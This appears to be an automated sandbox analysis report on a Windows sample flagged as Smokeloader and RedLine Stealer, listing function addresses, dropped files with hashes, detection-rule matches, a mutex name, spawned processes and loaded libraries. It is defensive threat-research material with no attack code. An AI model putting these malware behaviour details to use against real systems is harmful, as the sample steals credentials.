Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004059F0	1_2_004059F0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004239F2	1_2_004239F2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043C1F0	1_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0040F9FD	1_2_0040F9FD
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00425990	1_2_00425990
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043B9A1	1_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00406250	1_2_00406250
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041D270	1_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00424A74	1_2_00424A74
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00409230	1_2_00409230
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00423A34	1_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004192DA	1_2_004192DA
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043D2F0	1_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043C280	1_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00415298	1_2_00415298
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004082AE	1_2_004082AE
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004252BA	1_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041CB05	1_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00428BC0	1_2_00428BC0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004143C2	1_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00402BD0	1_2_00402BD0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00428BE9	1_2_00428BE9
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00437399	1_2_00437399
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004393A0	1_2_004393A0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00416BA5	1_2_00416BA5
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004293AA	1_2_004293AA
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004223B8	1_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00436C00	1_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00423410	1_2_00423410
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042B4FC	1_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004074B0	1_2_004074B0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041DD50	1_2_0041DD50
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00418578	1_2_00418578
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042D57E	1_2_0042D57E
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00424502	1_2_00424502
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00421D10	1_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0040DD25	1_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041D5E0	1_2_0041D5E0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00417582	1_2_00417582
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043D580	1_2_0043D580
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00427DA2	1_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004205B0	1_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042C64A	1_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00426E50	1_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042B4F7	1_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043462A	1_2_0043462A
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00435630	1_2_00435630
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004066E0	1_2_004066E0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042C6E4	1_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00430EF0	1_2_00430EF0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004256F9	1_2_004256F9
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00422E93	1_2_00422E93
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00425E90	1_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004156A0	1_2_004156A0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041BEA0	1_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00438EA0	1_2_00438EA0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00435EA0	1_2_00435EA0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041C6BB	1_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00415F66	1_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00419770	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00409700	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042C726	1_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042C735	1_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041DF80	1_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00402FA0	1_2_00402FA0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0091C0E8	1_2_0091C0E8
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00938009	1_2_00938009
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092C1AC	1_2_0092C1AC
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092E1E7	1_2_0092E1E7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00949107	1_2_00949107
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00946107	1_2_00946107
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00938108	1_2_00938108
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00941157	1_2_00941157
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094B2CF	1_2_0094B2CF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009442FF	1_2_009442FF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00913207	1_2_00913207
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093B393	1_2_0093B393
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093F397	1_2_0093F397
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009273B2	1_2_009273B2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009183C7	1_2_009183C7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094D307	1_2_0094D307
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00931347	1_2_00931347
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092F347	1_2_0092F347
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092734A	1_2_0092734A
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092B348	1_2_0092B348
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00919497	1_2_00919497
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009164B7	1_2_009164B7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092D4D7	1_2_0092D4D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093B427	1_2_0093B427
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00946447	1_2_00946447
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092144C	1_2_0092144C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009145D7	1_2_009145D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092C528	1_2_0092C528
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094D557	1_2_0094D557
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00929541	1_2_00929541
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00939611	1_2_00939611
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00949607	1_2_00949607
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009287DF	1_2_009287DF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094D7E7	1_2_0094D7E7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093D7E5	1_2_0093D7E5
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00917717	1_2_00917717
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093B763	1_2_0093B763
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00945897	1_2_00945897
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00944891	1_2_00944891
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093C8B1	1_2_0093C8B1
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00930817	1_2_00930817
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092D847	1_2_0092D847
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093B75E	1_2_0093B75E
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093C99C	1_2_0093C99C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093C98D	1_2_0093C98D
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009299D7	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009189F7	1_2_009189F7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092C921	1_2_0092C921
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00916947	1_2_00916947
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0093C94B	1_2_0093C94B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00919967	1_2_00919967
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094DA97	1_2_0094DA97
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00949A97	1_2_00949A97
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00945AF7	1_2_00945AF7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00927BA7	1_2_00927BA7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0091ABA7	1_2_0091ABA7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00935BF7	1_2_00935BF7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0091CB7E	1_2_0091CB7E
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00933C9B	1_2_00933C9B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00934CF4	1_2_00934CF4
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094BC08	1_2_0094BC08
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00913C27	1_2_00913C27
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00915C57	1_2_00915C57
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092DC47	1_2_0092DC47
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0091FC64	1_2_0091FC64
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00912E37	1_2_00912E37
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00946E67	1_2_00946E67
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0091DF8C	1_2_0091DF8C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092DFB7	1_2_0092DFB7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00928F35	1_2_00928F35
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00931F77	1_2_00931F77

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\5759.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: String function: 02480019 appears 119 times
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: String function: 00410720 appears 52 times
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: String function: 02480987 appears 52 times
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: String function: 0040FDB2 appears 123 times
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: String function: 009181D7 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: String function: 00414060 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: String function: 00407F70 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: String function: 009242C7 appears 74 times

Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 1892

Source: wN8pQhRNnu.exe	Binary or memory string: OriginalFileName vs wN8pQhRNnu.exe
Source: wN8pQhRNnu.exe, 00000000.00000003.1706839454.00000000024E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs wN8pQhRNnu.exe
Source: wN8pQhRNnu.exe, 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs wN8pQhRNnu.exe
Source: wN8pQhRNnu.exe, 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs wN8pQhRNnu.exe

Source: wN8pQhRNnu.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.4130543835.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2124427014.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: wN8pQhRNnu.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5759.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@11/5

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_009EA48E CreateToolhelp32Snapshot,Module32First,

0_2_009EA48E

Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Code function: 1_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

1_2_004361E0

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5660

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

File created: C:\Users\user\AppData\Local\Temp\5759.tmp

Jump to behavior

Source: wN8pQhRNnu.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wN8pQhRNnu.exe	ReversingLabs: Detection: 55%
Source: wN8pQhRNnu.exe	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\wN8pQhRNnu.exe "C:\Users\user\Desktop\wN8pQhRNnu.exe"
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Process created: C:\Users\user\AppData\Local\Temp\5759.tmp.exe "C:\Users\user\AppData\Local\Temp\5759.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 1892
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Process created: C:\Users\user\AppData\Local\Temp\5759.tmp.exe "C:\Users\user\AppData\Local\Temp\5759.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
